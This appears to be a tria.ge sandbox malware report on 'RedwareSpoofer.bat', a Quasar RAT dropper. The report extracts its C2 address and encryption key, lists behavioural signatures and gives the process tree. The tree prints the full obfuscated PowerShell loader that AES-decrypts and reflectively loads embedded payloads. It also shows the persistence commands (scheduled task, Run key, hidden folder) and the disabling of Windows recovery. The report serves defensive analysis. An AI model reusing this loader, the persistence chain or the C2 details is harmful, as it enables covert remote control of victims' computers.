Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
130s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
23/03/2025, 20:41
Static task
static1
Behavioral task
behavioral1
Sample
RedwareSpoofer.bat
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
RedwareSpoofer.bat
Resource
win10v2004-20250314-en
General
-
Target
RedwareSpoofer.bat
-
Size
504KB
-
MD5
7e3035eb197a52820c5a33c064917a8e
-
SHA1
147d70a538be4135dbd2ad4dbf2fd750a6d387ee
-
SHA256
747b16e1c41f4e99be3b52a4dbd712cd4d5407f6afffdf5d20f61b2e4c4d63b6
-
SHA512
f95b2c680d39bd529dac582aed23340b196bf85bb0bb2011261c8c3d59962d71e18e0d675bfd73c1e24675cc499e022cdc62b9daadd6b0f877ec97988ca8737c
-
SSDEEP
12288:iuXbEUU3h+QHSyN1iWFTM1hK0gddk5uMmYmi0125gDv:iuXbjUR+IRiWFTMjKpkL7a2sv
Malware Config
Extracted
quasar
1.4.1
Office04
45.145.41.216:4782
14f7ea9d-a87f-45a9-861e-84025067723f
-
encryption_key
144B0EE0DD77F21360C6C78F9C3080B2B44AE54D
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
System32
-
subdirectory
SubDir
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral2/memory/2880-60-0x000001A9E0230000-0x000001A9E02E0000-memory.dmp family_quasar -
Blocklisted process makes network request 6 IoCs
flow pid Process 22 2880 powershell.exe 38 2880 powershell.exe 54 2880 powershell.exe 59 2880 powershell.exe 68 2880 powershell.exe 69 2880 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 4412 powershell.exe 4648 powershell.exe 2880 powershell.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 1704 attrib.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftServiceManager = "wscript.exe \"C:\\ProgramData\\acwin_manager\\windows_systemManager.vbs\"" reg.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\Recovery ReAgentc.exe File opened for modification C:\Windows\system32\Recovery\ReAgent.xml ReAgentc.exe -
Drops file in Windows directory 8 IoCs
description ioc Process File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log ReAgentc.exe File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log ReAgentc.exe File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml ReAgentc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000_Classes\Local Settings powershell.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4692 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 4412 powershell.exe 4412 powershell.exe 4648 powershell.exe 4648 powershell.exe 2880 powershell.exe 2880 powershell.exe 2880 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4412 powershell.exe Token: SeDebugPrivilege 4648 powershell.exe Token: SeIncreaseQuotaPrivilege 4648 powershell.exe Token: SeSecurityPrivilege 4648 powershell.exe Token: SeTakeOwnershipPrivilege 4648 powershell.exe Token: SeLoadDriverPrivilege 4648 powershell.exe Token: SeSystemProfilePrivilege 4648 powershell.exe Token: SeSystemtimePrivilege 4648 powershell.exe Token: SeProfSingleProcessPrivilege 4648 powershell.exe Token: SeIncBasePriorityPrivilege 4648 powershell.exe Token: SeCreatePagefilePrivilege 4648 powershell.exe Token: SeBackupPrivilege 4648 powershell.exe Token: SeRestorePrivilege 4648 powershell.exe Token: SeShutdownPrivilege 4648 powershell.exe Token: SeDebugPrivilege 4648 powershell.exe Token: SeSystemEnvironmentPrivilege 4648 powershell.exe Token: SeRemoteShutdownPrivilege 4648 powershell.exe Token: SeUndockPrivilege 4648 powershell.exe Token: SeManageVolumePrivilege 4648 powershell.exe Token: 33 4648 powershell.exe Token: 34 4648 powershell.exe Token: 35 4648 powershell.exe Token: 36 4648 powershell.exe Token: SeIncreaseQuotaPrivilege 4648 powershell.exe Token: SeSecurityPrivilege 4648 powershell.exe Token: SeTakeOwnershipPrivilege 4648 powershell.exe Token: SeLoadDriverPrivilege 4648 powershell.exe Token: SeSystemProfilePrivilege 4648 powershell.exe Token: SeSystemtimePrivilege 4648 powershell.exe Token: SeProfSingleProcessPrivilege 4648 powershell.exe Token: SeIncBasePriorityPrivilege 4648 powershell.exe Token: SeCreatePagefilePrivilege 4648 powershell.exe Token: SeBackupPrivilege 4648 powershell.exe Token: SeRestorePrivilege 4648 powershell.exe Token: SeShutdownPrivilege 4648 powershell.exe Token: SeDebugPrivilege 4648 powershell.exe Token: SeSystemEnvironmentPrivilege 4648 powershell.exe Token: SeRemoteShutdownPrivilege 4648 powershell.exe Token: SeUndockPrivilege 4648 powershell.exe Token: SeManageVolumePrivilege 4648 powershell.exe Token: 33 4648 powershell.exe Token: 34 4648 powershell.exe Token: 35 4648 powershell.exe Token: 36 4648 powershell.exe Token: SeIncreaseQuotaPrivilege 4648 powershell.exe Token: SeSecurityPrivilege 4648 powershell.exe Token: SeTakeOwnershipPrivilege 4648 powershell.exe Token: SeLoadDriverPrivilege 4648 powershell.exe Token: SeSystemProfilePrivilege 4648 powershell.exe Token: SeSystemtimePrivilege 4648 powershell.exe Token: SeProfSingleProcessPrivilege 4648 powershell.exe Token: SeIncBasePriorityPrivilege 4648 powershell.exe Token: SeCreatePagefilePrivilege 4648 powershell.exe Token: SeBackupPrivilege 4648 powershell.exe Token: SeRestorePrivilege 4648 powershell.exe Token: SeShutdownPrivilege 4648 powershell.exe Token: SeDebugPrivilege 4648 powershell.exe Token: SeSystemEnvironmentPrivilege 4648 powershell.exe Token: SeRemoteShutdownPrivilege 4648 powershell.exe Token: SeUndockPrivilege 4648 powershell.exe Token: SeManageVolumePrivilege 4648 powershell.exe Token: 33 4648 powershell.exe Token: 34 4648 powershell.exe Token: 35 4648 powershell.exe -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 1176 wrote to memory of 4172 1176 cmd.exe 88 PID 1176 wrote to memory of 4172 1176 cmd.exe 88 PID 4172 wrote to memory of 4108 4172 net.exe 89 PID 4172 wrote to memory of 4108 4172 net.exe 89 PID 1176 wrote to memory of 4576 1176 cmd.exe 90 PID 1176 wrote to memory of 4576 1176 cmd.exe 90 PID 1176 wrote to memory of 2552 1176 cmd.exe 93 PID 1176 wrote to memory of 2552 1176 cmd.exe 93 PID 1176 wrote to memory of 4412 1176 cmd.exe 94 PID 1176 wrote to memory of 4412 1176 cmd.exe 94 PID 4412 wrote to memory of 4648 4412 powershell.exe 97 PID 4412 wrote to memory of 4648 4412 powershell.exe 97 PID 4412 wrote to memory of 2716 4412 powershell.exe 101 PID 4412 wrote to memory of 2716 4412 powershell.exe 101 PID 2716 wrote to memory of 1012 2716 WScript.exe 102 PID 2716 wrote to memory of 1012 2716 WScript.exe 102 PID 1012 wrote to memory of 3880 1012 cmd.exe 104 PID 1012 wrote to memory of 3880 1012 cmd.exe 104 PID 3880 wrote to memory of 2408 3880 net.exe 105 PID 3880 wrote to memory of 2408 3880 net.exe 105 PID 1012 wrote to memory of 5044 1012 cmd.exe 106 PID 1012 wrote to memory of 5044 1012 cmd.exe 106 PID 1012 wrote to memory of 2240 1012 cmd.exe 107 PID 1012 wrote to memory of 2240 1012 cmd.exe 107 PID 1012 wrote to memory of 2880 1012 cmd.exe 108 PID 1012 wrote to memory of 2880 1012 cmd.exe 108 PID 1176 wrote to memory of 4692 1176 cmd.exe 110 PID 1176 wrote to memory of 4692 1176 cmd.exe 110 PID 1176 wrote to memory of 4468 1176 cmd.exe 111 PID 1176 wrote to memory of 4468 1176 cmd.exe 111 PID 1176 wrote to memory of 1704 1176 cmd.exe 112 PID 1176 wrote to memory of 1704 1176 cmd.exe 112 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1704 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\RedwareSpoofer.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1176 -
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
PID:4172 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵PID:4108
-
-
-
C:\Windows\system32\ReAgentc.exereagentc.exe /disable2⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:4576
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zCWWg6vIbre+B0w3UuUd/NsHB3sHwnb8H8y/NYDt5PU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IKQYe9gd88vztHJcw6phFg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $kaqXF=New-Object System.IO.MemoryStream(,$param_var); $EQBuw=New-Object System.IO.MemoryStream; $sJMfi=New-Object System.IO.Compression.GZipStream($kaqXF, [IO.Compression.CompressionMode]::Decompress); $sJMfi.CopyTo($EQBuw); $sJMfi.Dispose(); $kaqXF.Dispose(); $EQBuw.Dispose(); $EQBuw.ToArray();}function execute_function($param_var,$param2_var){ $HYSQt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $gXvrb=$HYSQt.EntryPoint; $gXvrb.Invoke($null, $param2_var);}$latne = 'C:\Users\Admin\AppData\Local\Temp\RedwareSpoofer.bat';$host.UI.RawUI.WindowTitle = $latne;$czvVt=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($latne).Split([Environment]::NewLine);foreach ($JBkBq in $czvVt) { if ($JBkBq.StartsWith('WwSYUPskWuZgnEierlVQ')) { $YJdtG=$JBkBq.Substring(20); break; }}$payloads_var=[string[]]$YJdtG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:2552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4412 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_439_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_439.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4648
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_439.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_439.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:1012 -
C:\Windows\system32\net.exenet file5⤵
- Suspicious use of WriteProcessMemory
PID:3880 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file6⤵PID:2408
-
-
-
C:\Windows\system32\ReAgentc.exereagentc.exe /disable5⤵
- Drops file in Windows directory
PID:5044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zCWWg6vIbre+B0w3UuUd/NsHB3sHwnb8H8y/NYDt5PU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IKQYe9gd88vztHJcw6phFg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $kaqXF=New-Object System.IO.MemoryStream(,$param_var); $EQBuw=New-Object System.IO.MemoryStream; $sJMfi=New-Object System.IO.Compression.GZipStream($kaqXF, [IO.Compression.CompressionMode]::Decompress); $sJMfi.CopyTo($EQBuw); $sJMfi.Dispose(); $kaqXF.Dispose(); $EQBuw.Dispose(); $EQBuw.ToArray();}function execute_function($param_var,$param2_var){ $HYSQt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $gXvrb=$HYSQt.EntryPoint; $gXvrb.Invoke($null, $param2_var);}$latne = 'C:\Users\Admin\AppData\Roaming\Windows_Log_439.bat';$host.UI.RawUI.WindowTitle = $latne;$czvVt=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($latne).Split([Environment]::NewLine);foreach ($JBkBq in $czvVt) { if ($JBkBq.StartsWith('WwSYUPskWuZgnEierlVQ')) { $YJdtG=$JBkBq.Substring(20); break; }}$payloads_var=[string[]]$YJdtG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "5⤵PID:2240
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2880
-
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "Windows_SettingsManager" /tr "\"C:\ProgramData\acwin_manager\windows_systemManager.vbs\"" /sc onlogon /rl highest /f2⤵
- Scheduled Task/Job: Scheduled Task
PID:4692
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "MicrosoftServiceManager" /t REG_SZ /d "wscript.exe \"C:\ProgramData\acwin_manager\windows_systemManager.vbs\"" /f2⤵
- Adds Run key to start application
PID:4468
-
-
C:\Windows\system32\attrib.exeattrib +s +h C:\ProgramData\acwin_manager2⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1704
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
2KB
MD5005bc2ef5a9d890fb2297be6a36f01c2
SHA10c52adee1316c54b0bfdc510c0963196e7ebb430
SHA256342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
SHA512f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
504KB
MD57e3035eb197a52820c5a33c064917a8e
SHA1147d70a538be4135dbd2ad4dbf2fd750a6d387ee
SHA256747b16e1c41f4e99be3b52a4dbd712cd4d5407f6afffdf5d20f61b2e4c4d63b6
SHA512f95b2c680d39bd529dac582aed23340b196bf85bb0bb2011261c8c3d59962d71e18e0d675bfd73c1e24675cc499e022cdc62b9daadd6b0f877ec97988ca8737c
-
Filesize
115B
MD5731ab16030f423b66b128f17efdbfb73
SHA13b47e12575187b7d0ac7036bdf5e76490f98b952
SHA2561723dd5e2e5a1614a235e174ba78fd6cf14f6c333b44f9a56c2b32e70a13704f
SHA5124b83ace378f30212ad6415f5b61270853c20cd33c1317350377bfe9eaa2e3bd75e7dd49c4712a26d38317ac0dd544dc8252fa71768b21b24a82f1113188eed2f
-
Filesize
2KB
MD53e84107e1dd4caa265c3d22b7f7e7fc9
SHA1b92aceb1ee50be46fec28077288fd9247fc62ba1
SHA256281cbd0231fe4de2932f3dd0bff4576d92b7a5d97070925d62d10b272d2f57ad
SHA512092d03f3546d81adba43d702fd5b79bd3fadbcf8569fe49c3dd81d5b3de5bbf3c3b172a6af69da6f69a3c98ce51b6c1db666a7a65ac8e007b7ea1e0b4e4a2300
-
Filesize
11KB
MD58e193f4da80bb80060d23929482c3acf
SHA10d82b3479c78768c63815214a9f27ccc08f8480b
SHA25644e6ac132e9a3198f9a7d1855aaa826628fcc3793492c9363cd3db7484f8496c
SHA51233feb674b603258dc87c4313c81901d5b19824a133561a7ed52a2410c81aea48fe7ce4338563226dea2165ffce3ed7b3cc40ff3e8b819d6187d0acecfe2dc8be
-
Filesize
13KB
MD52b59ad678f0fa47b4d46319e91b5be4e
SHA13f5f1a2ca5bbd635ad420a082bcb85fe60da9b78
SHA256b4a7e152b8d2efe40c40ef9514059c0efed88a97c10d5e015a66c61f16c47f7b
SHA51269ec72b25f49d736eb45a2841bb0f7fb8ea7ca03a121fa146597f0430069d32f972ba7cb1fcb6f374e0c2927963638b35cb300c169ec80e2a24d5d75a9ae9280
-
Filesize
1KB
MD544b2da39ceb2c183d5dcd43aa128c2dd
SHA1502723d48caf7bb6e50867685378b28e84999d8a
SHA256894ee2b19608d10df4bf8b8f5bbcf40ce38c09c1f4c5543b6164f40c04bb270d
SHA51217744dcaddb49f17fe67dc3a579f4df2b6c2b196776330b71edfc58b37d1f8ae477bfb718d2f23401b78b789b7f984b19341f50fbecfba1bc101f596dee40604